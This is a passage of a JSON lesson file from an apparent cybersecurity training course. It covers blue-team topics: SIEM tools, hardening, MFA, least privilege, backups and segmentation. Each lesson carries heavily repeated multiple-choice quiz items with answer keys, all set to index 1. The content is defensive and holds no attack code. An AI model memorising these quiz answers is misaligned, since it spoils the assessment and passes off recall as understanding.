speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-df-splunk","cat":"Defense & Blue Team","title":"Splunk SIEM Basics","diff":2,"xp":150,"intro":"Search, monitor, and analyze log data.","sections":[{"type":"text","content":"Search, monitor, and analyze log data."},{"type":"code","lang":"bash","content":"SPL queries: index, sourcetype, stats, timechart, table"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"SPL stands for...","opts":["Security Protocol","Search Processing Language","Splunk Programming","System Protection"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-df-elk","cat":"Defense & Blue Team","title":"ELK Stack Setup","diff":2,"xp":150,"intro":"Elasticsearch + Logstash + Kibana for log analysis.","sections":[{"type":"text","content":"Elasticsearch + Logstash + Kibana for log analysis."},{"type":"code","lang":"bash","content":"Logstash ingests, Elasticsearch indexes, Kibana visualizes"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"In ELK, Elasticsearch...","opts":["Visualizes data","Stores and indexes log data","Collects logs","Creates alerts"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-df-harden-linux","cat":"Defense & Blue Team","title":"Linux Hardening Checklist","diff":1,"xp":75,"intro":"Essential steps for securing a Linux server.","sections":[{"type":"text","content":"Essential steps for securing a Linux server."},{"type":"code","lang":"bash","content":"Update, disable services, configure firewall, harden SSH, enable logging"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"First hardening step...","opts":["Install monitoring","Update and patch the system","Configure firewall","Disable SSH"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-df-harden-windows","cat":"Defense & Blue Team","title":"Windows Hardening","diff":1,"xp":100,"intro":"Reduce Windows attack surface.","sections":[{"type":"text","content":"Reduce Windows attack surface."},{"type":"code","lang":"bash","content":"Disable SMBv1, enable audit policies, configure firewall, password policies"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"SMBv1 should be disabled because...","opts":["It's slow","EternalBlue and other exploits target it","It's incompatible","It uses too much bandwidth"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-df-mfa","cat":"Defense & Blue Team","title":"Multi-Factor Authentication","diff":1,"xp":50,"intro":"Add a second factor beyond passwords.","sections":[{"type":"text","content":"Add a second factor beyond passwords."},{"type":"code","lang":"bash","content":"Something you know + something you have + something you are"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"MFA requires...","opts":["Just a password","Two or more authentication factors","Just biometrics","Just a token"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-df-least-privilege","cat":"Defense & Blue Team","title":"Principle of Least Privilege","diff":1,"xp":50,"intro":"Minimum access needed for the job.","sections":[{"type":"text","content":"Minimum access needed for the job."},{"type":"code","lang":"bash","content":"Don't give admin to everyone. Grant specific permissions for specific tasks"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-df-backup-321","cat":"Defense & Blue Team","title":"3-2-1 Backup Rule","diff":1,"xp":50,"intro":"3 copies, 2 media types, 1 offsite.","sections":[{"type":"text","content":"3 copies, 2 media types, 1 offsite."},{"type":"code","lang":"bash","content":"Protects against: hardware failure, ransomware, natural disaster"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"3-2-1 means...","opts":["3 servers","3 copies, 2 media types, 1 offsite","3 passwords","3 encryptions"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-df-seg","cat":"Defense & Blue Team","title":"Network Segmentation","diff":1,"xp":75,"intro":"Divide networks to limit lateral movement.","sections":[{"type":"text","content":"Divide networks to limit lateral movement."},{"type":"code","lang":"bash","content":"DMZ, internal, restricted, management, IoT \u2014 each isolated by firewalls"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Segmentation limits...","opts":["Speed","Lateral movement after a breach","Bandwidth","DNS queries"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack 